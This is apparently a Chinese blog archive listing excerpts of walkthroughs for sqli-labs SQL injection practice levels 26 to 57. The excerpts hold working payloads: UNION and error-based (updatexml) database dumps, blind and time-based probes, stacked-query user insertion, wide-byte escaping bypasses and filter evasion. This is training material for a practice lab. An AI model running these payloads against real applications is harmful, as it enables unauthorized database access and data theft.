03 2020 档案

Less(57)
摘要:1.和less(54)差不多, "闭合 2.爆破 (1)爆表:?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ (2)爆 阅读全文
posted @ 2020-03-24 11:21 孟雨 阅读(108) 评论(0) 推荐(0)
Less(56)
摘要:1.和Less(54)差不多, ')闭合 2.爆破 (1)爆表:?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ (2 阅读全文
posted @ 2020-03-24 11:13 孟雨 阅读(100) 评论(0) 推荐(0)
Less(55)
摘要:1.告诉了测试次数14次, union测试 数据库challenges 和Less(54)差不多, ) 闭合 2.爆破 (1)爆表:?id=0) union select 1,2,group_concat(table_name) from information_schema.tables wher 阅读全文
posted @ 2020-03-24 11:03 孟雨 阅读(149) 评论(0) 推荐(0)
Less(54)
摘要:1.查看php文件:kek下面的那段是未为了控制查询粗疏 2.爆破 (1)爆数据库:?id=0' union select 1,2,database()--+ (2)爆表名:?id=0' union select 1,2,group_concat(table_name) from informati 阅读全文
posted @ 2020-03-24 10:48 孟雨 阅读(163) 评论(0) 推荐(0)
Less(53)
摘要:1.单引号闭合 ?sort=1' 没有报错 ?sort=1" 2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1';insert into users(id,username,password) value (21,'less53','less53')- 阅读全文
posted @ 2020-03-24 10:26 孟雨 阅读(138) 评论(0) 推荐(0)
Less(52) GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By从句堆叠注入)
摘要:1.出错别关闭了 ?sort=1' 2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1;insert into users(id,username,password) value (20,'root','root') 3.也可以用盲注 原文链接:http 阅读全文
posted @ 2020-03-24 09:44 孟雨 阅读(111) 评论(0) 推荐(0)
Less(45)
摘要:1.这道题还是一道盲注,bp抓包,尝试各种闭合,当试到为')时成功写入新用户 阅读全文
posted @ 2020-03-14 16:08 孟雨 阅读(137) 评论(0) 推荐(0)
Less(44)
摘要:1.这道题没有报错回显,是一道盲注,经过测试,语句和Less(42)一样 阅读全文
posted @ 2020-03-14 15:55 孟雨 阅读(156) 评论(0) 推荐(0)
Less(43)
摘要:1.和Less(42)差不都 ')闭合 阅读全文
posted @ 2020-03-14 15:51 孟雨 阅读(140) 评论(0) 推荐(0)
Less(42)
摘要:1.bp抓包,账号处没有注入点,而密码有且没有任何加工处理,语句如图 阅读全文
posted @ 2020-03-14 15:48 孟雨 阅读(141) 评论(0) 推荐(0)
Less(51)
摘要:1.参考Less(46),单引号闭合 2.爆破 (1)爆库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0)) --+ (2)爆表:?sort=1' and(updatexml(1,concat(0x7e,(select gro 阅读全文
posted @ 2020-03-14 15:02 孟雨 阅读(119) 评论(0) 推荐(0)
Less(50)
摘要:1.参考 Less(46),数字型 2.爆破: (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0)) (2)爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_con 阅读全文
posted @ 2020-03-14 14:42 孟雨 阅读(110) 评论(0) 推荐(0)
Less(49)
摘要:1.参考Less(46) 2.时间盲注 阅读全文
posted @ 2020-03-14 14:32 孟雨 阅读(144) 评论(0) 推荐(0)
Less(48)
摘要:1.参考Less(46) 2.盲注 (1)布尔盲注:?sort=1 ^(select(select version()) regexp '^0') (2)时间盲注:?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test)) 阅读全文
posted @ 2020-03-14 14:13 孟雨 阅读(105) 评论(0) 推荐(0)
Less(47)
摘要:1.参看Less(46),闭合为单引号 2.爆破: (1)爆库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0)) --+ (2)爆表:?sort=1' and(updatexml(1,concat(0x7e,(select g 阅读全文
posted @ 2020-03-14 13:56 孟雨 阅读(126) 评论(0) 推荐(0)
Less(46)
摘要:1.看一下php (1)用order by 注入来看看 (2)通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入 ?sort=1+asc ?sort=1+desc 2.报错注入 (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(sel 阅读全文
posted @ 2020-03-14 11:47 孟雨 阅读(159) 评论(0) 推荐(0)
Less(41)
摘要:1.参考Less(38),这次变成数字型 2.爆破 (1)爆库:?id=1 and 1=2 union select 1,2,database() -- - (2)爆表:?id=1 and 1=2 union select 1,group_concat(table_name),3 from info 阅读全文
posted @ 2020-03-14 11:05 孟雨 阅读(110) 评论(0) 推荐(0)
Less(40)
摘要:1.参考Less(38),在单引号后加括号; 2.爆破 (1)爆库:?id=1') and 1=2 union select 1,database(),3-- - (2)爆表:?id=1') and 1=2 union select 1,group_concat(table_name),3 from 阅读全文
posted @ 2020-03-14 11:04 孟雨 阅读(186) 评论(0) 推荐(0)
Less(39)
摘要:1.和Less(38)差不多 2.爆破 (1)爆库:?id=0%9 union select 1,2,database() %23 (2)爆表:?id=0%9 union select 1,group_concat(table_name),3 from information_schema.tabl 阅读全文
posted @ 2020-03-14 11:03 孟雨 阅读(114) 评论(0) 推荐(0)
Less(38)GET-Stacked Query Injection -String
摘要:1.查看一下php, mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。(有这个才能进行堆叠)分号我们可以加入注入的新的语句 2.爆破: (1)爆库:?id=0%FE' union select 1,2,database() %23 (2)爆表:? 阅读全文
posted @ 2020-03-11 20:20 孟雨 阅读(178) 评论(0) 推荐(0)
Less(37)POST-Bypass MySQLreal escape_string
摘要:1.他和Less(34)关一样,查看源码,得知只是本关只是将过滤函数进行了替换: mysql_real_escape_string(),我们可以直接按照34关的方法即可,此处不再赘述 抓包之后,也是一样的问题 阅读全文
posted @ 2020-03-10 21:12 孟雨 阅读(160) 评论(0) 推荐(0)
Less(36)GET-Bypass MySQLreal escape_string
摘要:1.查看一下php文件: 这里使用了mysql_real_escape_string()函数来进行过滤,对于mysql_real_escape_string函数而言,它会转义以下特殊字符:\x00 , \n , \r , \ ,' , " , \x1a 如果转义成功,那么该函数返回被转义的字符,如果 阅读全文
posted @ 2020-03-05 08:31 孟雨 阅读(209) 评论(0) 推荐(0)
Less(35)GET-Bypass Add Slashes(we dont need them)Interger based
摘要:1.是数字类型 的 2.爆破 (1)爆库:?id=-1 union select 1,version(),database()--+ (2)爆表:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tabl 阅读全文
posted @ 2020-03-03 20:59 孟雨 阅读(143) 评论(0) 推荐(0)
Less(34)POST-Bypass AddSlashes
摘要:1. 万能密码 这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8 阅读全文
posted @ 2020-03-03 20:49 孟雨 阅读(335) 评论(0) 推荐(0)
Less(33)GET-Bypass AddSlasher()
摘要:1.和上一题一样的,payload都不用改 2.爆破 (1)爆库:?id=-1%E6' union select 1,2,database() --+ (2)爆表:?id=-1%E6' union select 1,group_concat(table_name),3 from informatio 阅读全文
posted @ 2020-03-03 18:44 孟雨 阅读(173) 评论(0) 推荐(0)
Less(32)GET - Bypass custom filter adding slashes to dangerous chars
摘要:1.查看一下php文件: check_addslashes()会在单引号前加一个\ 例如:I'm hacker 传入addslashes(),得到:I\'m hacker 本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过: 原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8 阅读全文
posted @ 2020-03-03 18:30 孟雨 阅读(192) 评论(0) 推荐(0)
Less(28a)GET - Bind Based- All your UNION & SELECT belong to us String-Double quote without parenthesis基于盲注的,有括号的双引号字符型,过滤了union和select等的注入
摘要:1.不知道为什么,明明写着是有括号的双引号字符型,却变成了单引号; 2.爆破: (1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 (2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_con 阅读全文
posted @ 2020-03-03 17:40 孟雨 阅读(142) 评论(0) 推荐(0)
Less(28)GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的,单引号字符型,过滤了union和select等的注入
摘要:1.这个和Less(27)差不多,就是把参数变成 id=('1') 2.爆破 (1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 (2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_conc 阅读全文
posted @ 2020-03-03 17:21 孟雨 阅读(192) 评论(0) 推荐(0)
Less(27a)GET - Blind Based- All your UNION & SELECT belong to us(盲注版本,双引号型的)
摘要:1.和Less(27)一样,就是把单引号闭合变成双引号闭合 验证一下:?id=0"%0bor(1)=(1)%26%26%0b"1 2.爆破: (1)爆库: ?id=0"%0buniOn%0bsElEct%0b1,database(),3%0bor%0b"1"="1 (2)爆表:?id=0"%0bun 阅读全文
posted @ 2020-03-03 16:29 孟雨 阅读(165) 评论(0) 推荐(0)
Less(27)GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)
摘要:1.查看一下php文件,发现不仅过滤了符号,还过滤了一些关键字,但是我们可以大小写结合 m (PCRE_MULTILINE)默认情况下,PCRE 认为目标字符串是由单行字符组成的(然而实际上它可能会包含多行), "行首"元字符 (^) 仅匹配字符串的开始位置, 而"行末"元字符 ($) 仅匹配字符串 阅读全文
posted @ 2020-03-03 15:40 孟雨 阅读(177) 评论(0) 推荐(0)
Less(31)GET-BLIND-IMPIDENCED MISMATCH-Having a WAF in front of web application
摘要:1.和Less(29)一样,参数变成 id=("1"),但是不知道为什么php5.3.29,5.4.45可以,其他两个无法显示 就会出现这个情况 2.爆破: (1)爆库:?id=-1") union select 1,database(),3 --+ (2)爆表:?id=-1") union sel 阅读全文
posted @ 2020-03-03 15:15 孟雨 阅读(140) 评论(0) 推荐(0)
Less(26a)GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)
摘要:1.这一关和Less(26)区别在于,在sql宇航员添加了一个括号,同时在SQL语句抛出错处后并不在前台页面输出,所以我们用排错型注入 sql语句:SELECT *FROM users WHERE id=('$id') LIMIT 0,1 2.爆破 (1)爆库:?id=0')%0bunion%0bs 阅读全文
posted @ 2020-03-02 15:27 孟雨 阅读(224) 评论(0) 推荐(0)
Less(26)Trick with comments and space (过滤了注释和空格的注入)
摘要:1.查看php文件,可以发现过滤了 or and /* -- # \s // (1)确认一下: ?id=%231 //确认过滤了# ?id=or1 //确认过滤了or ?id=/*1 //确认过滤了多行注释 ?id 1 //确认过滤了单行注释 ?id=/1 //确认过滤了斜杠 ?id=1' ' ' 阅读全文
posted @ 2020-03-01 20:56 孟雨 阅读(363) 评论(0) 推荐(0)
Less(30)Get-Blind Havaing with WAF
摘要:1.和上一题差不都,只是单引号变成双引号 id="1" 2.爆破: (1)爆库:?id=-1" union select 1,database(),3 --+ (2)爆表:?id=-1" union select 1,group_concat(table_name),3 from informati 阅读全文
posted @ 2020-03-01 20:11 孟雨 阅读(135) 评论(0) 推荐(0)
Less(29)基于WAF的一个错误
摘要:waf是只允许输入数字的,我们在输入数字的时候先给waf看然后检测正常后才转发给我们需要访问的页面,那篇文章是有写到的,这里我弄2个值,一个是用来欺骗waf的。另一个才是给我们需要访问页面的 看一下这篇博客,http://blog.csdn.net/nzjdsds/article/details/7 阅读全文
posted @ 2020-03-01 19:16 孟雨 阅读(175) 评论(0) 推荐(0)